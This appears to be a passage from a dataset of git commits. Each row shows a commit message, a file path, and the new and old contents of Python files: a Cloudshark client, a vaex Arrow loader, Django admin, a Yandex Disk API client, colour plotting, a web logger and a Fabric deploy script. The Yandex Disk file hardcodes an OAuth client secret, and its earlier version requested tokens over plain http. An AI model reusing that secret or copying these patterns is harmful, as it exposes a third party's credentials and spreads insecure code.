url = '%s/api/v1/%s/info/%s' % (self.url,self.token,id)
http = httplib2.Http()
(response,content) = http.request(url,method='GET')
http_status = response.get('status')
if http_status != '200':
print(response)
raise CloudsharkError('Error retrieving: %s'%url,http_status)
return json.loads(content)
def search_by_file_name(self,file_name):
"""Search for a capture by file name."""
url = '%s/api/v1/%s/search?search[filename]=%s' % (self.url,self.token,urllib.quote(file_name))
http = httplib2.Http()
(response,content) = http.request(url,method='GET')
http_status = response.get('status')
if http_status != '200':
print(response)
raise CloudsharkError('Error retrieving: %s'%url,http_status)
return json.loads(content)
def upload(self,file_object,file_name=None):
"""Upload a capture file to Cloudshark."""
url = '%s/api/v1/%s/upload' % (self.url,self.token)
BOUNDARY = "LANDSHARKCLOUDSHARK"
headers = {}
headers['Content-Type'] = 'multipart/form-data; boundary=%s' % BOUNDARY
if file_name is None:
file_name = os.path.basename(file_object.name)
file_content = file_object.read()
body_lines = ['--' + BOUNDARY,
'Content-Disposition: form-data; name="file"; filename="%s"' % file_name,
'Content-Type: application/octet-stream',
'',
file_content,
'--' + BOUNDARY + '--',
'']
b = io.BytesIO()
for body_line in body_lines:
if isinstance(body_line,unicode):
b.write(body_line.encode('utf-8'))
else:
b.write(body_line)
b.write(b'\r\n')
body = b.getvalue()
http = httplib2.Http()
(response,content) = http.request(url,method='POST',body=body,headers=headers)
http_status = response.get('status')
if http_status != '200':
print(response)
raise CloudsharkError('Error retrieving: %s'%url,http_status)
# content is a dict with "id" and "filename" entries.
return json.loads(content)
| Python | 0 |
1b668fa59624bc1f73f5fceebecbbadfc0038156 | support arrow DictionaryType | packages/vaex-arrow/vaex_arrow/dataset.py | packages/vaex-arrow/vaex_arrow/dataset.py | __author__ = 'maartenbreddels'
import logging
import pyarrow as pa
import pyarrow.parquet as pq
import vaex.dataset
import vaex.file.other
from .convert import column_from_arrow_array
logger = logging.getLogger("vaex_arrow")
class DatasetArrow(vaex.dataset.DatasetLocal):
"""Implements storage using arrow"""
def __init__(self, filename=None, table=None, write=False):
super(DatasetArrow, self).__init__(name=filename, path=filename, column_names=[])
self._write = write
if table is None:
self._load()
else:
self._load_table(table)
def _load(self):
source = pa.memory_map(self.path)
reader = pa.ipc.open_stream(source)
table = pa.Table.from_batches([b for b in reader])
self._load_table(table)
def _load_table(self, table):
self._length_unfiltered = self._length_original = table.num_rows
self._index_end = self._length_original = table.num_rows
for col in table.columns:
name = col.name
# TODO: keep the arrow columns, and support and test chunks
arrow_array = col.data.chunks[0]
if isinstance(arrow_array.type, pa.DictionaryType):
column = column_from_arrow_array(arrow_array.indices)
labels = column_from_arrow_array(arrow_array.dictionary).tolist()
self._categories[name] = dict(labels=labels, N=len(labels))
else:
column = column_from_arrow_array(arrow_array)
self.columns[name] = column
self.column_names.append(name)
self._save_assign_expression(name, vaex.expression.Expression(self, name))
@classmethod
def can_open(cls, path, *args, **kwargs):
return path.rpartition('.')[2] == 'arrow'
@classmethod
def get_options(cls, path):
return []
@classmethod
def option_to_args(cls, option):
return []
class DatasetParquet(DatasetArrow):
def _load(self):
# might not be optimal, but it works, we can always see if we can
# do mmapping later on
table = pq.read_table(self.path)
self._load_table(table)
vaex.file.other.dataset_type_map["arrow"] = DatasetArrow
vaex.file.other.dataset_type_map["parquet"] = DatasetParquet
| __author__ = 'maartenbreddels'
import logging
import pyarrow as pa
import pyarrow.parquet as pq
import vaex.dataset
import vaex.file.other
from .convert import column_from_arrow_array
logger = logging.getLogger("vaex_arrow")
class DatasetArrow(vaex.dataset.DatasetLocal):
"""Implements storage using arrow"""
def __init__(self, filename=None, table=None, write=False):
super(DatasetArrow, self).__init__(name=filename, path=filename, column_names=[])
self._write = write
if table is None:
self._load()
else:
self._load_table(table)
def _load(self):
source = pa.memory_map(self.path)
reader = pa.ipc.open_stream(source)
table = pa.Table.from_batches([b for b in reader])
self._load_table(table)
def _load_table(self, table):
self._length_unfiltered = self._length_original = table.num_rows
self._index_end = self._length_original = table.num_rows
for col in table.columns:
name = col.name
# TODO: keep the arrow columns, and support and test chunks
arrow_array = col.data.chunks[0]
column = column_from_arrow_array(arrow_array)
self.columns[name] = column
self.column_names.append(name)
self._save_assign_expression(name, vaex.expression.Expression(self, name))
@classmethod
def can_open(cls, path, *args, **kwargs):
return path.rpartition('.')[2] == 'arrow'
@classmethod
def get_options(cls, path):
return []
@classmethod
def option_to_args(cls, option):
return []
class DatasetParquet(DatasetArrow):
def _load(self):
# might not be optimal, but it works, we can always see if we can
# do mmapping later on
table = pq.read_table(self.path)
self._load_table(table)
vaex.file.other.dataset_type_map["arrow"] = DatasetArrow
vaex.file.other.dataset_type_map["parquet"] = DatasetParquet
| Python | 0 |
52239a9b6cd017127d52c29ac0e2a0d3818e7d9e | Add new lab_members fieldset_website to fieldsets for cms_lab_members | cms_lab_members/admin.py | cms_lab_members/admin.py | from django.contrib import admin
from cms.admin.placeholderadmin import PlaceholderAdminMixin
from lab_members.models import Scientist
from lab_members.admin import ScientistAdmin
class CMSScientistAdmin(PlaceholderAdminMixin, ScientistAdmin):
fieldsets = [
ScientistAdmin.fieldset_basic,
ScientistAdmin.fieldset_website,
ScientistAdmin.fieldset_advanced,
]
admin.site.unregister(Scientist)
admin.site.register(Scientist, CMSScientistAdmin)
| from django.contrib import admin
from cms.admin.placeholderadmin import PlaceholderAdminMixin
from lab_members.models import Scientist
from lab_members.admin import ScientistAdmin
class CMSScientistAdmin(PlaceholderAdminMixin, ScientistAdmin):
fieldsets = [
ScientistAdmin.fieldset_basic,
ScientistAdmin.fieldset_advanced,
]
admin.site.unregister(Scientist)
admin.site.register(Scientist, CMSScientistAdmin)
| Python | 0 |
dda3ebfcb9fff7f7304ee72c087dca9f8556fe6c | Update yadisk.py | cogs/utils/api/yadisk.py | cogs/utils/api/yadisk.py | import json
import requests
DEVICE_ID = '141f72b7-fd02-11e5-981a-00155d860f42'
DEVICE_NAME = 'DroiTaka'
CLIENT_ID = 'b12710fc26ee46ba82e34b97f08f2305'
CLIENT_SECRET = '4ff2284115644e04acc77c54526364d2'
class YaDisk(object):
def __init__(self, token):
self.session = requests.session()
self.session.headers.update({'Authentication': 'OAuth ' + str(token),})
def get_key_url():
format_url = "https://oauth.yandex.ru/authorize?response_type=code&client_id={}&device_id={}&device_name={}&force_confirm=yes"
return format_url.format(CLIENT_ID, DEVICE_ID, DEVICE_NAME)
def get_token(key):
res = requests.post('https://oauth.yandex.ru/token', data = {
'grant_type': 'authorization_code',
'code': key,
'client_id': CLIENT_ID,
'client_secret': CLIENT_SECRET,
'device_id': DEVICE_ID,
'device_name': DEVICE_NAME,
})
print(res.text)
return res.json()['access_token']
def _get(self, url, *args, **kwargs):
return self.session.get(url, *args, **kwargs)
def _post(self, url, data, *args, **kwargs):
return self.session.post(url, {'data': json.dumps(data), }, *args, **kwargs)
def list_files(self, dir_path):
file_list = []
res = self._get("https://cloud-api.yandex.net:443/v1/disk/resources", params={"path": dir_path,})
for file in res.json()['_embedded']['items']:
if file['type'] == 'file':
file_list.append(file['name'])
return file_list
def direct_link(self, file_path):
response = self.session._get("https://cloud-api.yandex.net:443/v1/disk/resources/download",
params={"path": file_path,})
return response.json()['href']
| import json
import requests
DEVICE_ID = '141f72b7-fd02-11e5-981a-00155d860f42'
DEVICE_NAME = 'DroiTaka'
CLIENT_ID = 'b12710fc26ee46ba82e34b97f08f2305'
CLIENT_SECRET = '4ff2284115644e04acc77c54526364d2'
class YaDisk(object):
def __init__(self, token):
self.session = requests.session()
self.session.headers.update({'Authentication': 'OAuth ' + str(token),})
def get_key_url():
format_url = "https://oauth.yandex.ru/authorize?response_type=code&client_id={}&device_id={}&device_name={}&force_confirm=yes"
return format_url.format(CLIENT_ID, DEVICE_ID, DEVICE_NAME)
def get_token(key):
res = requests.post('http://oauth.yandex.ru/token', data = {
'grant_type': 'authorization_code',
'code': key,
'client_id': CLIENT_ID,
'client_secret': CLIENT_SECRET,
'device_id': DEVICE_ID,
'device_name': DEVICE_NAME,
})
print(res.text)
return res.json()['access_token']
def _get(self, url, *args, **kwargs):
return self.session.get(url, *args, **kwargs)
def _post(self, url, data, *args, **kwargs):
return self.session.post(url, {'data': json.dumps(data), }, *args, **kwargs)
def list_files(self, dir_path):
file_list = []
res = self._get("https://cloud-api.yandex.net:443/v1/disk/resources", params={"path": dir_path,})
for file in res.json()['_embedded']['items']:
if file['type'] == 'file':
file_list.append(file['name'])
return file_list
def direct_link(self, file_path):
response = self.session._get("https://cloud-api.yandex.net:443/v1/disk/resources/download",
params={"path": file_path,})
return response.json()['href']
| Python | 0.000001 |
2eb1535c3bb137216548bacaf9f7a22cd9e0e8a2 | Fix incorrect double-quotes. | colour/plotting/graph.py | colour/plotting/graph.py | # -*- coding: utf-8 -*-
"""
Automatic Colour Conversion Graph Plotting
==========================================
Defines the automatic colour conversion graph plotting objects:
- :func:`colour.plotting.plot_automatic_colour_conversion_graph`
"""
from __future__ import division
from colour.graph import CONVERSION_GRAPH, CONVERSION_GRAPH_NODE_LABELS
from colour.utilities import is_networkx_installed
if is_networkx_installed(): # pragma: no cover
import networkx as nx
__author__ = 'Colour Developers'
__copyright__ = 'Copyright (C) 2013-2020 - Colour Developers'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'Colour Developers'
__email__ = 'colour-developers@colour-science.org'
__status__ = 'Production'
__all__ = ['plot_automatic_colour_conversion_graph']
def plot_automatic_colour_conversion_graph(filename, prog='fdp', args=''):
"""
Plots *Colour* automatic colour conversion graph using
`Graphviz <https://www.graphviz.org/>`__ and
`pyraphviz <https://pygraphviz.github.io>`__.
Parameters
----------
filename : unicode
Filename to use to save the image.
prog : unicode, optional
{'neato', 'dot', 'twopi', 'circo', 'fdp', 'nop'},
*Graphviz* layout method.
args : unicode, optional
Additional arguments for *Graphviz*.
Returns
-------
AGraph
*Pyraphviz* graph.
Notes
-----
- This definition does not directly plot the *Colour* automatic colour
conversion graph but instead write it to an image.
Examples
--------
>>> import tempfile
>>> import colour
>>> from colour import read_image
>>> from colour.plotting import plot_image
>>> filename = '{0}.png'.format(tempfile.mkstemp()[-1])
>>> _ = plot_automatic_colour_conversion_graph(filename, 'dot')
... # doctest: +SKIP
>>> plot_image(read_image(filename)) # doctest: +SKIP
.. image:: ../_static/Plotting_Plot_Colour_Automatic_Conversion_Graph.png
:align: center
:alt: plot_automatic_colour_conversion_graph
"""
if is_networkx_installed(raise_exception=True): # pragma: no cover
agraph = nx.nx_agraph.to_agraph(CONVERSION_GRAPH)
for node in agraph.nodes():
node.attr.update(label=CONVERSION_GRAPH_NODE_LABELS[node.name])
agraph.node_attr.update(
style='filled',
shape='circle',
color='#2196F3FF',
fillcolor='#2196F370',
fontname='Helvetica',
fontcolor='#263238')
agraph.edge_attr.update(color='#26323870')
for node in ('CIE XYZ', 'RGB', 'Spectral Distribution'):
agraph.get_node(node.lower()).attr.update(
shape='doublecircle',
color='#673AB7FF',
fillcolor='#673AB770',
fontsize=30)
for node in ('ATD95', 'CAM16', 'CIECAM02', 'Hunt', 'LLAB',
'Nayatani95', 'RLAB'):
agraph.get_node(node.lower()).attr.update(
color='#00BCD4FF', fillcolor='#00BCD470')
agraph.draw(filename, prog=prog, args=args)
return agraph
| # -*- coding: utf-8 -*-
"""
Automatic Colour Conversion Graph Plotting
==========================================
Defines the automatic colour conversion graph plotting objects:
- :func:`colour.plotting.plot_automatic_colour_conversion_graph`
"""
from __future__ import division
from colour.graph import CONVERSION_GRAPH, CONVERSION_GRAPH_NODE_LABELS
from colour.utilities import is_networkx_installed
if is_networkx_installed(): # pragma: no cover
import networkx as nx
__author__ = 'Colour Developers'
__copyright__ = 'Copyright (C) 2013-2020 - Colour Developers'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'Colour Developers'
__email__ = 'colour-developers@colour-science.org'
__status__ = 'Production'
__all__ = ['plot_automatic_colour_conversion_graph']
def plot_automatic_colour_conversion_graph(filename, prog='fdp', args=''):
"""
Plots *Colour* automatic colour conversion graph using
`Graphviz <https://www.graphviz.org/>`__ and
`pyraphviz <https://pygraphviz.github.io>`__.
Parameters
----------
filename : unicode
Filename to use to save the image.
prog : unicode, optional
{'neato', 'dot', 'twopi', 'circo', 'fdp', 'nop'},
*Graphviz* layout method.
args : unicode, optional
Additional arguments for *Graphviz*.
Returns
-------
AGraph
*Pyraphviz* graph.
Notes
-----
- This definition does not directly plot the *Colour* automatic colour
conversion graph but instead write it to an image.
Examples
--------
>>> import tempfile
>>> import colour
>>> from colour import read_image
>>> from colour.plotting import plot_image
>>> filename = '{0}.png'.format(tempfile.mkstemp()[-1])
>>> _ = plot_automatic_colour_conversion_graph(filename, 'dot')
... # doctest: +SKIP
>>> plot_image(read_image(filename)) # doctest: +SKIP
.. image:: ../_static/Plotting_Plot_Colour_Automatic_Conversion_Graph.png
:align: center
:alt: plot_automatic_colour_conversion_graph
"""
if is_networkx_installed(raise_exception=True): # pragma: no cover
agraph = nx.nx_agraph.to_agraph(CONVERSION_GRAPH)
for node in agraph.nodes():
node.attr.update(label=CONVERSION_GRAPH_NODE_LABELS[node.name])
agraph.node_attr.update(
style='filled',
shape='circle',
color='#2196F3FF',
fillcolor='#2196F370',
fontname='Helvetica',
fontcolor="#263238")
agraph.edge_attr.update(color='#26323870')
for node in ('CIE XYZ', 'RGB', 'Spectral Distribution'):
agraph.get_node(node.lower()).attr.update(
shape='doublecircle',
color='#673AB7FF',
fillcolor='#673AB770',
fontsize=30)
for node in ('ATD95', 'CAM16', 'CIECAM02', 'Hunt', 'LLAB',
'Nayatani95', 'RLAB'):
agraph.get_node(node.lower()).attr.update(
color='#00BCD4FF', fillcolor='#00BCD470')
agraph.draw(filename, prog=prog, args=args)
return agraph
| Python | 0.000178 |
14043a783e2ebd6c4a27a38f08ca75e6e31dd5d8 | Add show admin panel | cinemair/shows/admin.py | cinemair/shows/admin.py | from django.contrib import admin
from . import models
class ShowsInline(admin.TabularInline):
model = models.Show
extra = 0
@admin.register(models.Show)
class Show(admin.ModelAdmin):
fieldsets = (
(None, {"fields": ("cinema", "movie", "datetime")}),
)
list_display = ("id", "cinema", "movie", "datetime")
#list_editable = (,)
list_filter = ("cinema",)
search_fields = ("id", "cinema__name", "movie__title", "datetime")
date_hierarchy = "datetime"
ordering = ("cinema", "datetime")
| from django.contrib import admin
from . import models
class ShowsInline(admin.TabularInline):
model = models.Show
extra = 0
| Python | 0 |
9e1b3893a676f0fff7d601245fd06ec5df7fb61f | bump version | circleparse/__init__.py | circleparse/__init__.py | from circleparse.replay import parse_replay_file, parse_replay
__version__ = "6.1.0"
| from circleparse.replay import parse_replay_file, parse_replay
__version__ = "6.0.0"
| Python | 0 |
0251d41a46165f76b8e76da716bbc280723ce767 | Make the circuits.web.loggers.Logger understand and respect X-Forwarded-For request headers when logging the remote host | circuits/web/loggers.py | circuits/web/loggers.py | # Module: loggers
# Date: 6th November 2008
# Author: James Mills, prologic at shortcircuit dot net dot au
"""Logger Component
This module implements Logger Components.
"""
import os
import sys
import rfc822
import datetime
from circuits.core import handler, BaseComponent
def formattime():
now = datetime.datetime.now()
month = rfc822._monthnames[now.month - 1].capitalize()
return ("[%02d/%s/%04d:%02d:%02d:%02d]" %
(now.day, month, now.year, now.hour, now.minute, now.second))
class Logger(BaseComponent):
channel = "web"
format = "%(h)s %(l)s %(u)s %(t)s \"%(r)s\" %(s)s %(b)s \"%(f)s\" \"%(a)s\""
def __init__(self, file=None, logger=None, **kwargs):
super(Logger, self).__init__(**kwargs)
if type(file) is str:
self.file = open(os.path.abspath(os.path.expanduser(file)), "a")
elif type(file) is file or hasattr(file, "write"):
self.file = file
else:
self.file = sys.stdout
self.logger = logger
@handler("response")
def response(self, response):
self.log(response)
def log(self, response):
request = response.request
remote = request.remote
outheaders = response.headers
inheaders = request.headers
protocol = "HTTP/%d.%d" % request.protocol
if "X-Forwarded-For" in inheaders:
host = inheaders["X-Forwarded-For"]
else:
host = remote.name or remote.ip
atoms = {"h": host,
"l": "-",
"u": getattr(request, "login", None) or "-",
"t": formattime(),
"r": "%s %s %s" % (request.method, request.path, protocol),
"s": str(response.code),
"b": outheaders.get("Content-Length", "") or "-",
"f": inheaders.get("Referer", ""),
"a": inheaders.get("User-Agent", ""),
}
for k, v in atoms.items():
if isinstance(v, unicode):
v = v.encode("utf8")
elif not isinstance(v, str):
v = str(v)
# Fortunately, repr(str) escapes unprintable chars, \n, \t, etc
# and backslash for us. All we have to do is strip the quotes.
v = repr(v)[1:-1]
# Escape double-quote.
atoms[k] = v.replace("\"", "\\\"")
if self.logger is not None:
self.logger.info(self.format % atoms)
else:
self.file.write(self.format % atoms)
self.file.write("\n")
self.file.flush()
| # Module: loggers
# Date: 6th November 2008
# Author: James Mills, prologic at shortcircuit dot net dot au
"""Logger Component
This module implements Logger Components.
"""
import os
import sys
import rfc822
import datetime
from circuits.core import handler, BaseComponent
def formattime():
now = datetime.datetime.now()
month = rfc822._monthnames[now.month - 1].capitalize()
return ("[%02d/%s/%04d:%02d:%02d:%02d]" %
(now.day, month, now.year, now.hour, now.minute, now.second))
class Logger(BaseComponent):
channel = "web"
format = "%(h)s %(l)s %(u)s %(t)s \"%(r)s\" %(s)s %(b)s \"%(f)s\" \"%(a)s\""
def __init__(self, file=None, logger=None, **kwargs):
super(Logger, self).__init__(**kwargs)
if type(file) is str:
self.file = open(os.path.abspath(os.path.expanduser(file)), "a")
elif type(file) is file or hasattr(file, "write"):
self.file = file
else:
self.file = sys.stdout
self.logger = logger
@handler("response")
def response(self, response):
self.log(response)
def log(self, response):
request = response.request
remote = request.remote
outheaders = response.headers
inheaders = request.headers
protocol = "HTTP/%d.%d" % request.protocol
atoms = {"h": remote.name or remote.ip,
"l": "-",
"u": getattr(request, "login", None) or "-",
"t": formattime(),
"r": "%s %s %s" % (request.method, request.path, protocol),
"s": str(response.code),
"b": outheaders.get("Content-Length", "") or "-",
"f": inheaders.get("Referer", ""),
"a": inheaders.get("User-Agent", ""),
}
for k, v in atoms.items():
if isinstance(v, unicode):
v = v.encode("utf8")
elif not isinstance(v, str):
v = str(v)
# Fortunately, repr(str) escapes unprintable chars, \n, \t, etc
# and backslash for us. All we have to do is strip the quotes.
v = repr(v)[1:-1]
# Escape double-quote.
atoms[k] = v.replace("\"", "\\\"")
if self.logger is not None:
self.logger.info(self.format % atoms)
else:
self.file.write(self.format % atoms)
self.file.write("\n")
self.file.flush()
| Python | 0 |
3026d78dc6e2a0f6f391819370f2369df94e77eb | Move Data Portal / Other to bottom of contact select | ckanext/nhm/settings.py | ckanext/nhm/settings.py | #!/usr/bin/env python
# encoding: utf-8
#
# This file is part of ckanext-nhm
# Created by the Natural History Museum in London, UK
from collections import OrderedDict
# the order here matters as the default option should always be first in the dict so that it is
# automatically selected in combo boxes that use this list as a source for options
COLLECTION_CONTACTS = OrderedDict([
('Algae, Fungi & Plants', 'm.carine@nhm.ac.uk'),
('Economic & Environmental Earth Sciences', 'g.miller@nhm.ac.uk'),
('Fossil Invertebrates & Plants', 'z.hughes@nhm.ac.uk'),
('Fossil Vertebrates & Anthropology', 'm.richter@nhm.ac.uk'),
('Insects', 'g.broad@nhm.ac.uk'),
('Invertebrates', 'm.lowe@nhm.ac.uk'),
('Library & Archives', 'library@nhm.ac.uk'),
('Mineral & Planetary Sciences', 'm.rumsey@nhm.ac.uk'),
('Vertebrates', 'simon.loader@nhm.ac.uk'),
('Data Portal / Other', 'data@nhm.ac.uk'),
])
| #!/usr/bin/env python
# encoding: utf-8
#
# This file is part of ckanext-nhm
# Created by the Natural History Museum in London, UK
from collections import OrderedDict
# the order here matters as the default option should always be first in the dict so that it is
# automatically selected in combo boxes that use this list as a source for options
COLLECTION_CONTACTS = OrderedDict([
('Data Portal / Other', 'data@nhm.ac.uk'),
('Algae, Fungi & Plants', 'm.carine@nhm.ac.uk'),
('Economic & Environmental Earth Sciences', 'g.miller@nhm.ac.uk'),
('Fossil Invertebrates & Plants', 'z.hughes@nhm.ac.uk'),
('Fossil Vertebrates & Anthropology', 'm.richter@nhm.ac.uk'),
('Insects', 'g.broad@nhm.ac.uk'),
('Invertebrates', 'm.lowe@nhm.ac.uk'),
('Library & Archives', 'library@nhm.ac.uk'),
('Mineral & Planetary Sciences', 'm.rumsey@nhm.ac.uk'),
('Vertebrates', 'simon.loader@nhm.ac.uk'),
])
| Python | 0 |
2105143c63292ec225258b3ca129156d858cf972 | Use OrderParameterDistribution objects in wetting. | coex/wetting.py | coex/wetting.py | """Find the wetting properties of a direct or expanded ensemble
grand canonical simulation.
"""
import numpy as np
def get_cos_theta(s, d):
"""Calculate the cosine of the contact angle.
Args:
s: A float (or numpy array): the spreading coefficient.
d: A float (or numpy array): the drying coefficient.
Returns:
The cosine of the contact angle as a float or numpy array.
"""
return -(s - d) / (s + d)
def get_drying_coefficient(distribution):
"""Calculate the drying coefficient.
Args:
distribution: An OrderParameterDistribution from a direct (GC)
drying simulation.
Returns:
The dimensionless drying coefficient (beta*d*A).
See also:
get_spreading_coefficient()
"""
potential = -distribution.log_probabilities
valley = np.amin(potential)
split = int(0.5 * len(potential))
plateau = np.mean(potential[:split])
return valley - plateau
def get_expanded_ensemble_coefficients(valley, plateau, index, reference):
"""Calculate the change in spreading/drying coefficient for a pair of
simulations.
Args:
valley: An OrderParameterDistribution from the valley region.
plateau: An OrderParameterDistribution from the plateau
region.
index: The reference subensemble number.
reference: The reference spreading/drying coefficient.
Returns:
A numpy array with the spreading/drying coefficient of each
subensemble.
"""
return reference - (valley - valley[index]) + (plateau - plateau[index])
def get_spreading_coefficient(distribution):
"""Calculate the spreading coefficient.
Args:
distribution: An OrderParameterDistribution from a direct (GC)
spreading simulation.
Returns:
The dimensionless spreading coefficient (beta*s*A).
See Also:
get_drying_coefficient()
"""
potential = -distribution.log_probabilities
valley = np.amin(potential)
split = int(0.5 * len(potential))
plateau = np.mean(potential[split:])
return valley - plateau
def get_tension(s, d):
"""Calculate the interfacial tension.
Args:
s: A float (or numpy array): the spreading coefficient.
d: A float (or numpy array): the drying coefficient.
Returns:
The interfacial tension in the appropriate units.
"""
return -0.5 * (s + d)
| """Find the wetting properties of a direct or expanded ensemble
grand canonical simulation.
"""
import numpy as np
def get_cos_theta(s, d):
"""Calculate the cosine of the contact angle.
Args:
s: A float (or numpy array): the spreading coefficient.
d: A float (or numpy array): the drying coefficient.
Returns:
The cosine of the contact angle as a float or numpy array.
"""
return -(s - d) / (s + d)
def get_drying_coefficient(lnpi):
"""Calculate the drying coefficient.
Args:
lnpi: The logarithm of the probability distribution.
Returns:
The dimensionless drying coefficient (beta*d*A).
See also:
get_spreading_coefficient()
"""
potential = -lnpi
valley = np.amin(potential)
split = int(0.5 * len(potential))
plateau = np.mean(potential[:split])
return valley - plateau
def get_expanded_ensemble_coefficients(valley, plateau, index, reference):
"""Calculate the change in spreading/drying coefficient for a pair of
simulations.
Args:
valley: The logarithm of the probability distribution of the
valley region.
plateau: The logarithm of the probability distribution of the
plateau region.
index: The reference subensemble number.
reference: The reference spreading/drying coefficient.
Returns:
A numpy array with the spreading/drying coefficient of each
subensemble.
"""
return reference - (valley - valley[index]) + (plateau - plateau[index])
def get_spreading_coefficient(lnpi):
"""Calculate the spreading coefficient.
Args:
potential: The logarithm of the probability distribution.
Returns:
The dimensionless spreading coefficient (beta*s*A).
See Also:
get_drying_coefficient()
"""
potential = -lnpi
valley = np.amin(potential)
split = int(0.5 * len(potential))
plateau = np.mean(potential[split:])
return valley - plateau
def get_tension(s, d):
"""Calculate the interfacial tension.
Args:
s: A float (or numpy array): the spreading coefficient.
d: A float (or numpy array): the drying coefficient.
Returns:
The interfacial tension in the appropriate units.
"""
return -0.5 * (s + d)
| Python | 0 |
a962e631b0fc997a6a5569244463c3f96da8b671 | add extra fwhm2sigma test | lib/neuroimaging/fmri/tests/test_utils.py | lib/neuroimaging/fmri/tests/test_utils.py | import unittest
import numpy as N
import scipy
from neuroimaging.fmri.utils import CutPoly, WaveFunction, sigma2fwhm, fwhm2sigma
class utilTest(unittest.TestCase):
def test_CutPoly(self):
f = CutPoly(2.0)
t = N.arange(0, 10.0, 0.1)
y = f(t)
scipy.testing.assert_almost_equal(y, [x*x for x in t])
f = CutPoly(2.0, (5, 7))
y = f(t)
scipy.testing.assert_almost_equal(y, [x*x*(x >= 5 and x < 7) for x in t])
f = CutPoly(2.0, (None, 7))
y = f(t)
scipy.testing.assert_almost_equal(y, [x*x*(x < 7) for x in t])
f = CutPoly(2.0, (5, None))
y = f(t)
scipy.testing.assert_almost_equal(y, [x*x*(x >= 5) for x in t])
def test_WaveFunction(self):
start = 5.0
duration = 2.0
height = 3.0
f = WaveFunction(5, 2, 3)
t = N.arange(0, 10.0, 0.1)
y = f(t)
scipy.testing.assert_almost_equal(y, [height*(x >= start and x < start + duration) for x in t])
def test_sigma_fwhm(self):
"""
ensure that fwhm2sigma and sigma2fwhm are inverses of each other
"""
fwhm = N.arange(1.0, 5.0, 0.1)
sigma = N.arange(1.0, 5.0, 0.1)
scipy.testing.assert_almost_equal(sigma2fwhm(fwhm2sigma(fwhm)), fwhm)
scipy.testing.assert_almost_equal(fwhm2sigma(sigma2fwhm(sigma)), sigma)
if __name__ == '__main__':
unittest.main()
| import unittest
import numpy as N
import scipy
from neuroimaging.fmri.utils import CutPoly, WaveFunction, sigma2fwhm, fwhm2sigma
class utilTest(unittest.TestCase):
def test_CutPoly(self):
f = CutPoly(2.0)
t = N.arange(0, 10.0, 0.1)
y = f(t)
scipy.testing.assert_almost_equal(y, [x*x for x in t])
f = CutPoly(2.0, (5, 7))
y = f(t)
scipy.testing.assert_almost_equal(y, [x*x*(x >= 5 and x < 7) for x in t])
f = CutPoly(2.0, (None, 7))
y = f(t)
scipy.testing.assert_almost_equal(y, [x*x*(x < 7) for x in t])
f = CutPoly(2.0, (5, None))
y = f(t)
scipy.testing.assert_almost_equal(y, [x*x*(x >= 5) for x in t])
def test_WaveFunction(self):
start = 5.0
duration = 2.0
height = 3.0
f = WaveFunction(5, 2, 3)
t = N.arange(0, 10.0, 0.1)
y = f(t)
scipy.testing.assert_almost_equal(y, [height*(x >= start and x < start + duration) for x in t])
def test_sigma_fwhm(self):
"""
ensure that fwhm2sigma and sigma2fwhm are inverses of each other
"""
fwhm = N.arange(1.0, 5.0, 0.1)
scipy.testing.assert_almost_equal(sigma2fwhm(fwhm2sigma(fwhm)), fwhm)
if __name__ == '__main__':
unittest.main()
| Python | 0.000001 |
108763ace5f250922387aacffab4a668155cfe67 | deploy script changes | deploy/fabfile.py | deploy/fabfile.py | # -*- coding: utf-8 -*-
# http://docs.fabfile.org/en/1.5/tutorial.html
from __future__ import with_statement
from fabric.api import *
from contextlib import contextmanager as _contextmanager
@_contextmanager
def virtualenv():
with prefix(env.virtualenv_activate):
yield
env.hosts = ['176.58.125.166']
env.user = 'rootio'
env.project_root = '/home/rootio/public_python/rootio_web'
env.virtualenv_activate = 'source venv/bin/activate'
env.forward_agent = True
def git_update():
stash_str = run("git stash")
run("git pull origin master")
if stash_str.strip() != 'No local changes to save':
run("git stash pop")
def restart_apache():
sudo("/etc/init.d/apache2 graceful")
def restart_cache():
sudo("/etc/init.d/memcached restart", pty=False)
def touch_wsgi():
# Touching the deploy.wsgi file will cause apache's mod_wsgi to
# reload all python modules having to restart apache.
with cd(env.project_root):
run("touch deploy/rootio_web.wsgi")
def update(full=False):
with cd(env.project_root):
git_update()
with virtualenv():
run("pip install -r requirements.txt")
run("python manage.py migrate up")
#todo: static files
touch_wsgi()
#restart_cache()
#restart_apache()
def deploy():
update()
def initdb():
local("python manage.py initdb")
def reset():
"""
Reset local debug env.
"""
local("rm -rf /tmp/instance")
local("mkdir /tmp/instance")
def runserver():
"""
Run local server, for debugging only.
Need to move up one directory, from deploy to see manage.py
"""
with lcd('..'):
reset()
initdb()
with virtualenv():
local("python manage.py run")
| # -*- coding: utf-8 -*-
# http://docs.fabfile.org/en/1.5/tutorial.html
from __future__ import with_statement
from fabric.api import *
from contextlib import contextmanager as _contextmanager
@_contextmanager
def virtualenv():
with prefix(env.virtualenv_activate):
yield
env.hosts = ['176.58.125.166']
env.user = 'rootio'
env.project_root = '/home/rootio/public_python/rootio_web'
env.virtualenv_activate = 'source .venv/bin/activate'
env.forward_agent = True
def git_update():
stash_str = run("git stash")
run("git pull origin master")
if stash_str.strip() != 'No local changes to save':
run("git stash pop")
def restart_apache():
sudo("/etc/init.d/apache2 graceful")
def restart_cache():
sudo("/etc/init.d/memcached restart", pty=False)
def touch_wsgi():
# Touching the deploy.wsgi file will cause apache's mod_wsgi to
# reload all python modules having to restart apache.
with cd(env.project_root):
run("touch deploy/wsgi_handler.py")
def update(full=False):
with cd(env.project_root):
git_update()
with virtualenv():
run("pip install -r requirements.txt")
#todo: alembic update
#todo: static files
touch_wsgi()
restart_cache()
#restart_apache()
def deploy():
update()
def initdb():
local("python manage.py initdb")
def reset():
"""
Reset local debug env.
"""
local("rm -rf /tmp/instance")
local("mkdir /tmp/instance")
def runserver():
"""
Run local server, for debugging only.
Need to move up one directory, from deploy to see manage.py
"""
with lcd('..'):
reset()
initdb()
with virtualenv():
local("python manage.py run")
| Python | 0.000001 |
34fa7433ea6f04089a420e0392605147669801d1 | Revert "added more crappy codes" | dummy.py | dummy.py | import os
def foo():
"""
This is crappy function. should be removed using git checkout
"""
return None
def main():
pass
if __name__ == '__main__':
main()
| import os
def foo():
"""
This is crappy function. should be removed using git checkout
"""
if True == True:
return True
else:
return False
def main():
pass
if __name__ == '__main__':
main()
| Python | 0 |
e4850d9ba5cb4733862194298cdbb8a34766b39f | update tests for new api | reddit.py | reddit.py | import json, random, urllib2
def declare():
